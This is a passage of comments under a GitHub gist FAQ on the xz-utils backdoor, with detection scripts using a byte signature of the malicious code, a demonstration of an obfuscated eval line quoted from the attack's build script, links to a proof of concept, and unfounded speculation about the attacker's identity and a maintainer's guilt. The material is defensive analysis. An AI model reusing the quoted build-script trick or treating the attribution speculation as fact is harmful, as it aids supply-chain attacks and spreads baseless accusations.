@fungilife It would be clear by now if their commit behaviours matched in any way. GitHub's ban doesn't help, but I don't think the schedules match up at all.

Unless you have any data-backed observations, I do think your observation is useless. I suggest you gather up some data on public holidays and match it up with both people; the analysis needs to be done first.

@AdrianBunk

@fungilife

easter

Sam did not even say "due to easter", it might just have been "I will also be away next weekend".

For those pointing fingers to geography and ethnicity, need I remind them that this holiday is observed by western christian religions/geographies, catholics/protestants etc, not eastern (from Siberia to East Africa), nor hindus, budhists, jews, or muslims. Orthodox related easter holidays are late April.

You are pretty fast at presenting incorrect conclusions as facts.

South Korea is home to more than 13 million Christians (Catholics and Protestants).

Hong Kong and Taiwan are both in the timezone the attacker used, and each of them is home to one million Christians who observe Easter at the Western Christian date.

Even if you assume that the +0800 timezone is correct and that the attacker is a Christian observing the Western Easter date, that leaves 2 million people.

It is also possible that the attacker is located somewhere in Europe, the timezone might or might not be faked.

I have been a long term fan of xz and hate to bash it even more, but the possibility of the two contributors being one and the same appears to have escaped nearly everyone here.

This possibility is something everyone has in mind, but everything that is known so far is a strong indication that these are separate people and that Lasse is a victim.

As an example, the first step being in build-to-host.m4 which is a file that is not (and should not be) in git strongly looks like an attempt by "Jia Tan" to hide the change from Lasse.
Someone else noticing the manipulation in build-to-host.m4, which can be compared with the original file in gnulib, is actually far more likely than someone noticing a manipulation hidden in the autoconf macros Lasse wrote earlier. Without another maintainer who could ask questions, the exploit might have started there.

Tarballs have been signed by this "entity" as versions pretty far back, further than some people seem to perceive as "safe" versions.

I apologize if some of you feel this observation is useless.

You should perhaps apologize to Lasse for such public slander that is not backed up by anything.

@WaaromZoMoeilijk

Can someone help me understand what we ought to do with liblzma opposed to downgrading xz-utils itself? It seems my script will downgrade xz-utils just fine but liblzma stays on current distro version, would love some input on this as I'm quite sure we'd need to downgrade this one as well but I'm not really sure to which version.
https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

The actual backdoor payload is in liblzma. When it's dynamically linked with /usr/sbin/sshd (through indirect dependency introduced by libsystemd, with some specific preconditions checked inside the payload) it will intercept some libcrypto functions (direct dependency of sshd).

Thank you, so it's not even as straightforward as some articles have claimed, i.e. just downgrading xz-utils.
Would you or anyone know if the snippet below would detect this in a reliable way, and how to extract the proper hexdump signature?

LZMAPATH="$(ldd "$(which sshd)" | grep liblzma | grep -o '/[^ ]*')" # find path to liblzma used by sshd

# check if liblzma is used by sshd by @Vegard Nossum
if [ -z "$LZMAPATH" ]
then
	echo "Probably not vulnerable based on missing liblzma used by sshd"
	exit 0 # nothing to scan, so skip the signature check below
fi

# check for malicious function signature by @Vegard Nossum
if hexdump -ve '1/1 "%.2x"' "$LZMAPATH" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
	echo "Probably vulnerable based on signature hexdump"
else
	echo "Probably not vulnerable based on signature hexdump"
fi

@thijskh

thijskh commented Apr 1, 2024

@thesamesam Small correction: the gist mentions Hans Jensen (2x) but the actual (assumed) name is Hans Jansen

@pillowtrucker

JIA CHEONG TAN
CIA JHEONG TAN
CIA JHON EGTAN
CIA JOHN AGENT
CIA AGENT JOHN
Case closed

@goyalyashpal

JIA CHEONG TAN
CIA JHEONG TAN
CIA JHON EGTAN
CIA JOHN AGENT
CIA AGENT JOHN
Case closed

😲😱💯✨

@erinacio

erinacio commented Apr 1, 2024

Can someone help me understand what we ought to do with liblzma opposed to downgrading xz-utils itself? It seems my script will downgrade xz-utils just fine but liblzma stays on current distro version, would love some input on this as I'm quite sure we'd need to downgrade this one as well but I'm not really sure to which version.
https://github.com/WaaromZoMoeilijk/Security/blob/main/CVE-2024-3094.sh

The actual backdoor payload is in liblzma. When it's dynamically linked with /usr/sbin/sshd (through indirect dependency introduced by libsystemd, with some specific preconditions checked inside the payload) it will intercept some libcrypto functions (direct dependency of sshd).

Thank you, so its not even as straight forward as some articles have claimed to just downgrade just xz-utils. Would you or anyone know if the snippit below would detect this in a reliable way and how to extract the proper hexdump signature?

LZMAPATH="$(ldd "$(which sshd)" | grep liblzma | grep -o '/[^ ]*')" # find path to liblzma used by sshd

# check if liblzma is used by sshd by @Vegard Nossum
if [ -z "$LZMAPATH" ]
then
	echo "Probably not vulnerable based on missing liblzma used by sshd"
	exit 0 # nothing to scan, so skip the signature check below
fi

# check for malicious function signature by @Vegard Nossum
if hexdump -ve '1/1 "%.2x"' "$LZMAPATH" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410
then
	echo "Probably vulnerable based on signature hexdump"
else
	echo "Probably not vulnerable based on signature hexdump"
fi

The script looks legitimate as long as the hexdump is correct, and it's possibly the most widely spread script, so many people may already be using it. However, I would suggest against relying on such a script if you can't figure out how it works on your own.

If your xz/lzma comes from the distro repository, just follow the guide published by the distro you use. For example, if you're using Debian and the xz/liblzma is installed from the official repository (or any of its mirrors), you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro doesn't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

If you build packages on your own and can't figure out if you're affected or not, I would personally suggest you switch to distro-provided packages, as distro maintainers are more proficient at figuring out what to do and provide the necessary guides to anyone who needs them.

@marco-silva0000

marco-silva0000 commented Apr 1, 2024

I've seen this being shared as a POC, can anyone confirm? https://github.com/amlweems/xzbot

@fungilife

... or one hell of an April fools joke brewing for many days now ... and many nights of rebuilding everything we have

@ostrosablin

There's one question that's still bothering me, even after looking through the various preliminary reverse engineering reports so far. Is there any understanding of where the backdoor spends ~0.5 seconds?

That's quite a lot of time for a modern CPU. Even though the backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that the slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

@iustin

iustin commented Apr 1, 2024

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

I've been only passively watching this thread since it has a lot of non-technical craziness in it, but indeed this is a point that bothered me as well. 500ms is really, really a lot, especially for compiled code.

I find it somewhat strange that someone/some group that clearly has a lot of know-how, judging by how real-looking the commits that introduce the backdoor are, was not able to make this half-invisible to anyone who is not debugging it already knowing what to look for. It's almost as if the person in charge of launching the backdoor had different knowledge/standards than the person introducing it.

Well, will be a good read once the dust settles.

@Cicada2024

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?
That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

I've been only passively watching this thread since it has a lot of non-technical craziness in it, but indeed this is a point that bothered me as well. 500ms is really, really a lot, especially for compiled code.

I find it somewhat strange that someone/some group that clearly has a lot of know-how based on how real-looking the commits that introduce the backdoor are, but not being able to make this half-invisible for anyone that is not debugging this knowing already what to look for. Almost as if the person in charge for launching the back door had different knowledge/standards than the person introducing it.

Well, will be a good read once the dust settles.

Same reason that people who know they should keep some information half-invisible to anyone debugging their backdoor still, at times, choose to converse about it in public forums, because they think no one will understand the convo without insider information. Everyone has lapses and gets sloppy at times; Jia Tan is just a person like the rest of us.

@ve2tmq

ve2tmq commented Apr 1, 2024

JIA CHEONG TAN CIA JHEONG TAN CIA JHON EGTAN CIA JOHN AGENT CIA AGENT JOHN Case closed

pub (4)rsa4096/22d465f2b4c173803b20c6de59fcf207fea7f445 2022-12-28T15:23:29Z

uid Jia Tan jiat0218@gmail.com
sig sig 59fcf207fea7f445 2022-12-28T15:23:29Z 2027-12-27T15:23:29Z ____________________ [selfsig]
sig sig 38ee757d69184620 2024-01-12T19:12:25Z ____________________ ____________________ 38ee757d69184620

sub (4)rsa4096/63fcf405bbe267a235a3537e63cce556c94dda4f 2022-12-28T15:23:29Z
sig sbind 59fcf207fea7f445 2022-12-28T15:23:29Z ____________________ 2027-12-27T15:23:29Z []

@gh-markt

gh-markt commented Apr 1, 2024

y'know, even downgrading xz-utils to an earlier version isn't viable if you were grabbing the source from GitHub and compiling it yourself. The only downgrade path that exists is if you still have a compiled older version hanging around. Not everyone is tied to particular "distributions".

@donington

This is a great resource and references most of the stuff I've found researching this myself so far. Great stuff.

I found a repo earlier by user @amlweems with a very interesting write-up and project, called xzbot, in which he prods the payload and has done some reverse engineering on it. It seems to heavily imply that this was supposed to be RCE when receiving a payload tied to a specific Ed448 key.

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

This is just speculation on my part, but maybe waiting and scanning for detection of the key was part of why it caused such a delay in the sshd login process.

@x1done

x1done commented Apr 1, 2024

thesamesam:

easter

For those pointing fingers at geography and ethnicity, need I remind them that this holiday is observed by Western Christian religions/geographies (Catholics, Protestants, etc.), not Eastern ones (from Siberia to East Africa), nor by Hindus, Buddhists, Jews, or Muslims. Orthodox Easter holidays are in late April.

I have been a long term fan of xz and hate to bash it even more, but the possibility of the two contributors being one and the same appears to have escaped nearly everyone here. Tarballs have been signed by this "entity" as versions pretty far back, further than some people seem to perceive as "safe" versions.

I apologize if some of you feel this observation is useless.

Your observation is not useless.

I have found some commit logs indicating Jia Tan from the +300 timezone as well, and @redcode had been testing it. However, we were asked by Mr @AdrianBunk and @cwegener to "shut up" and "stop posting here", regardless of the result of the test by @redcode (Mr @AdrianBunk was not interested in the test result at all - this is a red flag).

I went through all the comments from Mr @AdrianBunk and @cwegener. Interestingly enough, most of their comments were about China or timezone +800. Apparently, some people are not interested in the logs and what really happened.

At this stage, it is probably too early to speculate, but it is also not prudent to declare anyone innocent. I would just like to point out the following:

  • In real-life cases, an attacker will always try to hide their real trace. However, very often, they accidentally leak their real trace somewhere.

  • Let's consider it from an attacker's perspective. They would need expertise in developing xz, gain the trust of the owner to obtain maintainer access, and submit backdoors without being detected by other maintainers. What would be their success rate? Very low I believe. However, with the theory you mentioned, two maintainers being one person, the success rate becomes 100%.

@ve2tmq

ve2tmq commented Apr 1, 2024

Who is Jia Tan?

I spent my whole day reading threads about this "attack". I call it that because it's not a vulnerability, it's an attack against the open source community.

Modifying the build to inject a payload from a unit-test "corrupted file" takes a lot of knowledge. Targeting XZ, when we know it's one of the most useful compression algorithms and is used directly in the Linux kernel, is not random.

Was it just one guy who worked nearly 3 years on this project? I don't know...

Today, open source, Linux, glibc, and XZ are present on more than 80% of servers and IoT devices. We are in a period of many political threats. Russia vs Ukraine, Gaza vs Palestine, North Korea... Is it sponsored by a government? I don't know. It's just a possibility.

This is proof of the community's solidarity.

Keep in mind that source code can now be a target in an unstable world. 😢

@duracell

duracell commented Apr 1, 2024

@x1done

I have found some commit logs indicating Jia Tan from the +300 timezone as well, and @redcode had been testing it. However, we were asked by Mr AdrianBunk and cwegener to "shut up" and "stop posting here", regardless of the result of the test by redcode (Mr AdrianBunk was not interested in the test result at all - this is a red flag).

Because you are not interested in the explanation and just keep posting the same thing over and over, which is just wrong.

I went through all the comments from Mr @AdrianBunk and @cwegener. Interestingly enough, most of their comments were about China or timezone +800. Apparently, some people are not interested in the logs and what really happened.

Interestingly, your account is brand new and you keep posting the same stuff here over and over again. Besides, it's obvious that the reason for this timezone is a patch, rebase, or other git operation. It's fine to post this finding once, but discussing it over and over without any need is just spam.
That's the reason why multiple people posted that you should stop spamming about it, and a lot more are thinking the same.
If you want to discuss this, open a chat, repo, gist, whatever for this specific topic, but PLEASE do not spam here without any useful information or proof.

@morpheby

morpheby commented Apr 1, 2024

@x1done
FYI there is already a pretty good writeup about times, timezones, and nationalities: https://rheaeve.substack.com/p/xz-backdoor-times-damned-times-and

Unlike you, the author does not go into baseless accusations and slandering.

This FAQ is one of the best and most up-to-date repositories of known truths about the xz attack. Stop turning it into a chatroom for speculation and conspiracy theories. Go somewhere else, please.

@christoofar

y'know, even downgrading xz-utils to an earlier version isn't viable if you were grabbing the source from github and compiling it oneself. The only downgrade path that exists is if you still have a compiled older version hanging around. Not everyone is tied to particular "distributions".

The dreaded build-to-host.m4 is not in the origin repo because Jia nuked it in a .gitignore to be sneaky. Debian has it because it got it from upstream; they have their own git, it's over there, and they used it to bake the tarball and the package, which was the intended goal all along.

The tons of people direct-binding xz by baking liblzma.so never got the steps to extract out the .o payload so gcc could link it.
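
For anyone who wants to look for this kind of tarball-vs-git mismatch themselves, here is a minimal sketch. It assumes you have already unpacked a release tarball and checked out the matching git tag into two directories; the function name and the demo paths are made up for illustration. Keep in mind that release tarballs legitimately ship generated files that are not in git, so extra files are a starting point for review, not proof of tampering.

```shell
#!/bin/sh
# Sketch: list files that exist in an unpacked release tarball but not in a
# git checkout of the same release. Both directories are supplied by the caller.
tarball_only_files() {
    tarball_dir=$1
    git_dir=$2
    tarball_list=$(mktemp)
    git_list=$(mktemp)
    (cd "$tarball_dir" && find . -type f | LC_ALL=C sort) > "$tarball_list"
    # Skip git's own metadata so it does not pollute the comparison.
    (cd "$git_dir" && find . -type f ! -path './.git/*' | LC_ALL=C sort) > "$git_list"
    # comm -23 prints only the lines unique to the first (tarball) list.
    LC_ALL=C comm -23 "$tarball_list" "$git_list"
    rm -f "$tarball_list" "$git_list"
}

# Demo with made-up trees: one file exists only in the "tarball".
demo=$(mktemp -d)
mkdir -p "$demo/tarball/m4" "$demo/git/.git"
touch "$demo/tarball/configure.ac" "$demo/git/configure.ac"
touch "$demo/tarball/m4/build-to-host.m4" "$demo/git/.git/config"
tarball_only_files "$demo/tarball" "$demo/git"   # prints ./m4/build-to-host.m4
rm -rf "$demo"
```

The listing only tells you which files to read by hand; it says nothing about files that exist in both trees but differ in content.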

@x1done

x1done commented Apr 1, 2024

@morpheby thank you for the link, that's an interesting analysis. i won't post anything more here (i am not a developer), since there is already the good writeup on the timezone analysis.

@n1x3n

n1x3n commented Apr 1, 2024

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?
That's quite a lot of time for modern CPU. Even though backdoor uses sophisticated obfuscation, the logic reversed so far doesn't seem to involve any heavy number crunching. And considering that slowdown applies even when sshd is started with "-h", there isn't even cryptography involved.

I've been only passively watching this thread since it has a lot of non-technical craziness in it, but indeed this is a point that bothered me as well. 500ms is really, really a lot, especially for compiled code.
I find it somewhat strange that someone/some group that clearly has a lot of know-how based on how real-looking the commits that introduce the backdoor are, but not being able to make this half-invisible for anyone that is not debugging this knowing already what to look for. Almost as if the person in charge for launching the back door had different knowledge/standards than the person introducing it.
Well, will be a good read once the dust settles.

Same reason as people who know they should make some information half invisible to anyone debugging their backdoor at times still choose to converse about it in public forums because they think no one will understand the convo without insider information. Everyone has lapses and get sloppy at times, Jia Tan is just a person like we all.

^== Is exactly this conversing about it in public forums? ;) (Sorry, just somehow got cicada-vibes because of your ~5hrs old account. :))

Anyways, as I understand from Andres Freund's message on oss-security, parsing the symbol tables in memory was the quite slow step in the malware code, which is what made him initially look into it. Maybe that's where the ~0.5s are spent.

@christoofar

christoofar commented Apr 1, 2024

A word about Jia's commits to the base lib itself:

I have spent a good deal of my working career keeping high-level code going with C/C++ deplibs (and whole programs that take on a job step) that, once they've proven their mettle in production, nobody cares to touch. Sometimes re-writes are needed in the C source, but typically they are done with a good motivating reason.

Jia pumped out a shitstorm of commits and introduced two advertised features: RISCV support and multithread decomp. A shitton of his commits however are around moving to a modern buildstream from a project that followed the old pattern of C projects: the nasty autoconf, an even nastier Makefile, a patternless approach to tests, etc---and moving all that around in a big CMake refactor, tons of commits to change static-but-commented numbers and defines over to enums, .po ing the code everywhere, and whole moveouts and relocations of functionality (what Lasse put into file_io.c for sandbox, moving over to sandbox.c), etc.

It's just a lot of activity to be doing for what arguably are just not big features... and wouldn't you want to get the features out, at least the simple RISCV one that's mostly a copypasta job (which is what he did, look at the increment-assign statements where the arithmetic is written out without any comment, which is what Lasse did elsewhere earlier in the history) and then pull them back into a mega-cleanup-branch anyway?

I would think if you cared so much about readability of the top-line constants that you would give a shit about the meat-and-potatoes part of the code where there's whole stretches of uncommented bitmath.

I feel Lasse should just wipe out and rebase back to pre-Jia because so much trust is shaken by the autotools shenanigans that Jia's refactoring work should be thrown in the trash. I don't think he poisoned up the baselib, it's just part of the social engineering mainly to fool Lasse. If anything, a legit volunteer who wants to contribute now has a ready-done refactoring that can be examined line by line, day by day, and re-decided if it was worth it or Jia was just generating commit noise.

I guess for FOSS crews one lesson is this: Someone wants to onboard because feature X is not there? Great. Welcome to the team. Go henceforth and finish it in your own branch. Oh, you decided that the code is too ugly/puts out a storm of warnings and you prefer quiet compiles? Great! Another branch for you. Let's keep stable going and backport the commits to the cleanup branch! Wait... why do you need to screw around in the autotool scripts? Can we isolate that need to the specific feature commits involved so the commits that put on the feature also have the script changes, because ac scripts are a nightmare and delicate?

Sole maintainer handing off to an anon sole maintainer? Well, what choice do the users have other than marking the last stable commit good and everything else sus until some trusted people come to do a drive-by vouch? All the people linking directly to the build thought they were being helpful busy beavers, keeping their dependencies from going stale and risking compat problems; they didn't know what Jia was up to.

And I'm not even going to get into what I think of systemd architecture (oh good, you're going to dynload now. golf clap) because that's a whole international Come To Jesus™ meeting that needs to happen and I need to take my arthritis medication. (Spare me with the tone-policing surrounding libsystemd, it was "this is good for you take the medicine" adoption, it fixes so much operations architecture just do it, etc etc. Now here we are kvetching about systemd architecture.)

@mikebveil

mikebveil commented Apr 2, 2024

I've seen this being shared as a POC, can anyone confirm? https://github.com/amlweems/xzbot

Looks legit to me, but note that the backdoor can only be exploited by the owner of the attacker's Ed448 private key. xzbot patches liblzma with a different key, so that people can experiment with triggering the exploit in a sandboxed environment. That's all.

@gonoph

gonoph commented Apr 2, 2024

One thing I would like folks to deeply consider is the social engineering that went on, either maliciously or inadvertently.

The May 2022 message from Dennis Ens added some soft pressure to Lasse to implement some changes. Then, ~3 weeks later, Jigar Kumar adds several replies that are aggressive and borderline abusive to Lasse.

We again see this type of pressure 2 years later, when krygorin4545 pressures Debian package maintainers to adopt an NMU version bump of xz-utils.

Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn't done an upload in 5 years.

Fedora considered this a serious bug and fixed it weeks ago

Evan Boehs' summary (you have linked above) has some interesting timelines about this interaction.

The social engineering aspect of this was mentioned on a mastodon thread, which I think every project contributor should take to heart:

RT Carol (Nichols || Goulding) ꙮ @carol@crabby.fyi

the lesson I'm choosing to take from xz, as an oss maintainer, is that anyone trying to pressure or guilt me into doing something should immediately be told no, for security reasons

RT mybarkingdogs @mybarkingdogs@freeradical.zone

@ carol This is literally a good lesson for EVERYONE in anything, not even just software.

Giving into pressure/guilt is DANGEROUS

In personal relationships, it's one of the worst mistakes: it tells an abuser/manipulator you're a target.

In anything financial, it's often a baited hook for a scam

In politics it gets you pulled into anything from outright far-right fascist bullshit like qanon to "left" (but not really left, obviously!) groups that are state-sponsored ops or personality cults

@gh-nate

gh-nate commented Apr 2, 2024

@thesamesam
Author

@gh-nate That looks wonderful. I'll add it now.

@thesamesam
Author

@thijskh Fixing, thanks!

@dong-zeyu

I believe Jia used a similar trick when first introducing the IFUNC implementation. User hansjans162 (I suspect it's just another identity of Jia) created the PR for the IFUNC implementation instead of Jia himself, and Jia then showed up below it to emphasize its importance and made many suggestions. That made the situation 2:1 and made it harder for Larhzu to refuse the PR, even though he raised some concerns.

More generally, most maintainers will (implicitly) rate the importance of an issue/PR by the number of comments/upvotes/watches/etc. So an attacker can easily create some dummy identities to increase the exposure of the issue to the maintainers (like how the Debian package maintainers were pressured) and even affect the maintainers' decision.

@imv7

imv7 commented Apr 2, 2024

There is already automation for finding these vulnerability patterns across all libraries. Likewise, there are already vulnerabilities in the blockchain, but none of this has been revealed yet.

@orbea

orbea commented Apr 2, 2024

I just want to point out that this exploit may not represent a single bad actor, but it could be an organized group of collaborators. Even a single username can be possibly shared by multiple different people.

@daniel-dona

Just sharing this funny commit "Simplify SECURITY.md"...

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=af071ef7702debef4f1d324616a0137a5001c14c

-While both options are available, we prefer email. In any case, please
-provide a clear description of the vulnerability including:
-
-- Affected versions of XZ Utils
-- Estimated severity (low, moderate, high, critical)
-- Steps to recreate the vulnerability
-- All relevant files (core dumps, build logs, input files, etc.)
+While both options are available, we prefer email.

@NuLL3rr0r

Just sharing this funny commit "Simplify SECURITY.md"...

https://git.tukaani.org/?p=xz.git;a=commitdiff;h=af071ef7702debef4f1d324616a0137a5001c14c

-While both options are available, we prefer email. In any case, please
-provide a clear description of the vulnerability including:
-
-- Affected versions of XZ Utils
-- Estimated severity (low, moderate, high, critical)
-- Steps to recreate the vulnerability
-- All relevant files (core dumps, build logs, input files, etc.)
+While both options are available, we prefer email.

Lol, best commit message I've ever seen! Terse and to the point.

@shide1989

JIA CHEONG TAN CIA JHEONG TAN CIA JHON EGTAN CIA JOHN AGENT CIA AGENT JOHN Case closed

💯

@thesamesam
Author

Please try to keep the comments on this gist for new resources which need to be added to the doc, corrections, edits, or questions which appear not answered elsewhere. Thanks!

@ldarby2

ldarby2 commented Apr 2, 2024

@thesamesam about the italics idea for new content, please don't; it's better if people just watch the changelog of this document at https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27/revisions instead. The italics would need to be undone as the content gets older, and that also puts changes into the changelog. Thanks.

@thesamesam
Author

thesamesam commented Apr 2, 2024

@ldarby2 OK, thanks for the feedback!

@flybyray

flybyray commented Apr 2, 2024

I pass all my day as read thread about this "attack", because it's not a vulnerability, it's an "attack" against OpenSources community.

Most people expressed their outrage, but only a few were aware of what was really going on!

Modify code to inject payload from unittest "corrupted file", it's needs big knowledge. Target XZ when we know it's most usefull algorithme for compression and used directly in Linux kernel, this is not random.

At the time of writing this comment there are only 2 occurrences of the word "kernel" on this page. I will add another reference to the actual target of this supply chain attack.

Consider that an xz binary provided via a package could have integrated the blob and would be able to detect a generic build environment. The eval here:
https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/xz_wrap.sh?h=next-20240328#n36
could do harm to generic vanilla kernel builds.
It would be called from here: https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/tree/scripts/Makefile.lib?h=next-20240328#n528 Ask yourself why they used sh as a pipe target and not the tool itself, as is done for the others (KBZIP2, LZMA, ZSTD, ...). The shell process provides a lot more background information useful for activating the payload injections.

As this was committed only shortly before the public announcement of this CVE, we might infer time pressure on the attackers' side. I guess they had detected the valgrind issues on their own and knew that their buggy payload was already out, hence they were under time pressure to push things into the kernel world.

https://git.kernel.org/pub/scm/linux/kernel/git/next/linux-next.git/diff/?h=next-20240328&id2=757ea48c7452355bab0d0827cfa0b16f4fd780d8

@Gasu16

Gasu16 commented Apr 2, 2024

This is a great resource and references most of the stuff I've found researching this myself so far. Great stuff.

I found a repo earlier by user @amlweems that has a very interesting write-up and project where he is prodding the payload called xzbot, where he has done some reverse engineering on it. Seems to heavily imply that this was supposed to be RCE when receiving a specific ED448 key payload.

There's one question that's still bothering me, even after looking through various preliminary reverse engineering reports so far. Is there any understanding, where does backdoor spend ~0.5 seconds?

This is just speculation on my part, but maybe waiting and scanning for detection of the key was part of why it caused such a delay in the sshd login process.

When crc64_resolve() is invoked, it starts by performing checks on various data from the dynamic linker, on the program arguments, and on the environment.
After that, it starts parsing the symbol tables in memory; this seems to be what causes the 500ms lag in the ssh authentication flow.

@dfl23

dfl23 commented Apr 2, 2024

Same reason as people who know they should make some information half invisible to anyone debugging their backdoor at times still choose to converse about it in public forums because they think no one will understand the convo without insider information. Everyone has lapses and get sloppy at times, Jia Tan is just a person like we all.

Is he now ?
You're making a guess here.

Could be a single person, could be 3, could be a whole team.
Could be CIA, could be PRC...

@makotom

makotom commented Apr 2, 2024

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

// That being said, I understand there are enough other signals suggesting that glibc-based systems on AMD64 were targeted. Just being noisy in case I've misunderstood - apologies! 🙇

@thesamesam
Author

(Sorry, I haven't had a chance to play with this, I did spin up a VM but I've been shattered. I still have the notes open and plan on poking.)

@fungilife

fungilife commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, by using sd_notify and by building the pkgs as they do. You are branding as irresponsible those who were unaffected?
Was Alpine affected? Should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not.)
You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell?

Easy there!

Unless someone is not telling us the WHOLE true story, if it wasn't for systemd, deb and rpm there would have been nothing to talk about here, would there?

@Z-nonymous

@Z-nonymous Thanks for your review! I have one thing to underline here - as @Artoria2e5 says:

recall that grep ^build=\'x86_64 config.status above means if build is ever set, it has to start with x86_64.

That means, AIUI, your third example never happens in terms of shell scripts, and instead we need to review the case where build is undefined to emulate non-AMD64 situations.

Yes, though it could be an attempt to make it harder to identify which platform is targeted / protected.

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single command. This command is then read and executed by the shell, and its exit status is returned as the value of eval. If there are no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation, or the real exempted targets.

Insert a Drake meme with "RCE on all Linuxes" vs "RCE on all Linuxes but the platform I use"

@gh-nate

gh-nate commented Apr 2, 2024

A walkthrough of the xz attack shell script.
An RC4 variant in Awk, what more could you want?
https://research.swtch.com/xz-script
https://hachyderm.io/@rsc/112200603337903320

@xry111

xry111 commented Apr 2, 2024

AFAIK, the eval line just runs the grep command:

eval [arg ...]
The args are read and concatenated together into a single command. This command is then read and executed by the shell, and its exit status is returned as the value of eval. If there are no args, or only null arguments, eval returns 0.

Since the return code is not used it's a useless line... or obfuscation or the real excempted targets.

No. The code is:

eval `grep ^build=\'x86_64 config.status`

From info bash:

3.5.4 Command Substitution

Command substitution allows the output of a command to replace the
command itself. Command substitution occurs when a command is enclosed
as follows:

$(COMMAND)

or

`COMMAND`

Bash performs the expansion by executing COMMAND in a subshell
environment and replacing the command substitution with the standard
output of the command, with any trailing newlines deleted.

So after command substitution it becomes:

eval build='x86_64-pc-linux-gnu'

And yes the exit code is still discarded, but the command build='x86_64-pc-linux-gnu' is still executed by the shell. You can try an example:

cat > config.status << EOF
unrelated_thing_1='114514'
build='x86_64-linux-gnu'
unrelated_thing_2='1919810'
EOF

eval `grep ^build=\'x86_64 config.status`
echo $build

It will output x86_64-linux-gnu. So this line is not a no-op, it basically reads the variable "build" out of config.status.
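
To cover the other case raised above (a build triplet that does not start with x86_64), here is a small companion sketch. The helper name read_build and the file contents are made up for illustration; only the eval/grep line mirrors the one quoted from the script. When grep finds no match it prints nothing, eval receives an empty argument, and build simply stays unset.

```shell
#!/bin/sh
# Sketch: behaviour of the eval/grep line for matching and non-matching triplets.
# read_build is a hypothetical helper; it runs in a subshell so that `build`
# never leaks into (or from) the calling shell.
read_build() {
    (
        unset build
        eval `grep "^build='x86_64" "$1"`
        printf '%s\n' "$build"
    )
}

tmpdir=$(mktemp -d)
printf '%s\n' "build='x86_64-pc-linux-gnu'" > "$tmpdir/amd64.status"
printf '%s\n' "build='aarch64-unknown-linux-gnu'" > "$tmpdir/arm64.status"

read_build "$tmpdir/amd64.status"   # prints x86_64-pc-linux-gnu
read_build "$tmpdir/arm64.status"   # prints an empty line: build was never set
rm -rf "$tmpdir"
```

So on a non-x86_64 build the variable is empty rather than holding some other triplet, which matches the point that if build is ever set by this line, it has to start with x86_64.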

@erinacio

erinacio commented Apr 2, 2024

Please refrain from using this for propaganda and distro-bashing

you can follow the Debian Security Advisory. For RHEL and Fedora users, this post from Red Hat should help.

If your distro don't publish such security guides (could be as simple as a tweet/toot/whatever, but must be informative), I would personally suggest you move to a more responsible distro.

Debian and its derivatives and RH-distros were the ones affected by it, and by using sd_notify and by building the pkgs as they do. You are branding irresposnible those who were unaffected? Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl? (I don't know whether they actually published a warning or not). You are saying they should dump Alpine and use Ubuntu testing or Fedora or RHell

Easy there!

Unless someone is not telling us ALL the true and entire story if it wasn't for systemd deb and rpm there would have been nothing to talk about here, would there be?

You just misinterpreted what I meant. Even a simple notice like "We're not affected." is sufficient in such a case. A more comprehensive notice (like what Arch did) could be better, but is not strictly required.

I think it's a basic responsibility for a distro maintainer to publish such a notice. I didn't mean, and never meant, that Debian or Red Hat or anything else is superior and that users should switch to them. I took them as examples just because they're affected and have wide user adoption. openSUSE was also affected and published a great guide, but because it seems to have less adoption I didn't list it in my original comment.

Was Alpine affected, should they publish instructions for how this xz compromise couldn't do jack on musl?

Yes. I really think they should, but don't need to go into tech depth. Just say "We use musl so we're not affected." is sufficient. There are even macOS users who just installed xz 5.6.x from homebrew and worried if they could be hacked. Not all people can understand how the backdoor works.

Update: And they really did: https://twitter.com/alpinelinux/status/1773781993844519408. Just as I said, responsible distros will publish such notices.
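
For users who just want to know which version they have, a rough sketch of a version check follows. It only compares the reported version number against the two releases named in the FAQ (5.6.0 and 5.6.1); it cannot tell whether the backdoor is actually present or reachable on a given system, and the function names are made up for illustration. It assumes the first line of `xz --version` ends with the version number.

```shell
#!/bin/sh
# Sketch: flag the two release versions named in the FAQ (5.6.0 and 5.6.1).
is_backdoored_release() {
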